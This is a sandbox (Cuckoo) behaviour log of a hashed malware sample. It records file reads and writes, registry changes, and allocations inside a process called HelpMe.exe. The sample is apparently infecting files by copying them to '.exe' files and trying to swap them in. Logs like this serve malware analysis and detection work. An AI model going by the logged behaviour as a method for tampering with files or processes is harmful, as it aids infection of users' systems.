"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->9614"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->9614"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->612","szExeFile->HelpMe.exe","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->12288"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->12288"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->268"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->268"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegCreateKeyExW","SUCCESS","0x000001e0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001e0","lpValueName->Common Start Menu"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegCreateKeyExW","SUCCESS","0x000001e0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegSetValueExW","SUCCESS","","hKey->0x000001e0","lpValueName->Common Start Menu","dwType->1","lpData->C:\Documents and Settings\All Users\Start Menu","cbData->94"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001e0","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001dc","hKey->0x000001e0","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001dc","lpValueName->Generation"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegCreateKeyExW","SUCCESS","0x000001dc","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001dc","lpValueName->Common AppData"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegCreateKeyExW","SUCCESS","0x000001dc","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegSetValueExW","SUCCESS","","hKey->0x000001dc","lpValueName->Common AppData","dwType->1","lpData->C:\Documents and Settings\All Users\Application Data","cbData->106"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001dc","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001e0","hKey->0x000001dc","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001e0","lpValueName->Generation"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","DeleteFileW","FAILURE","","lpFileName->C:\cuckoo\dll\JTBmeJ.dll"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","MoveFileWithProgressW","FAILURE","","lpExistingFileName->C:\cuckoo\dll\JTBmeJ.dll.exe","lpNewFileName->C:\cuckoo\dll\JTBmeJ.dll"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","CreateFileW","SUCCESS","0x000001e0","lpFileName->C:\cuckoo\dll\OmvuNt.dll","dwDesiredAccess->GENERIC_READ"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToRead->268"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","CreateFileW","SUCCESS","0x000001e0","lpFileName->C:\b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","dwDesiredAccess->GENERIC_READ"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","CreateFileW","SUCCESS","0x000001dc","lpFileName->C:\cuckoo\dll\OmvuNt.dll","dwDesiredAccess->GENERIC_READ"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","CreateFileW","SUCCESS","0x000001bc","lpFileName->C:\cuckoo\dll\OmvuNt.dll.exe","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->420","szExeFile->b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToRead->9614"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->9614"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->612","szExeFile->HelpMe.exe","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->12288"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->12288"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->268"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->268"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","DeleteFileW","FAILURE","","lpFileName->C:\cuckoo\dll\OmvuNt.dll"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","MoveFileWithProgressW","FAILURE","","lpExistingFileName->C:\cuckoo\dll\OmvuNt.dll.exe","lpNewFileName->C:\cuckoo\dll\OmvuNt.dll"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","CreateFileW","SUCCESS","0x000001bc","lpFileName->C:\cuckoo\files\.gitignore","dwDesiredAccess->GENERIC_READ"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->268"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","CreateFileW","SUCCESS","0x000001bc","lpFileName->C:\b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","dwDesiredAccess->GENERIC_READ"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","CreateFileW","SUCCESS","0x000001dc","lpFileName->C:\cuckoo\files\.gitignore","dwDesiredAccess->GENERIC_READ"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","CreateFileW","SUCCESS","0x000001e0","lpFileName->C:\cuckoo\files\.gitignore.exe","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->612","szExeFile->HelpMe.exe","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
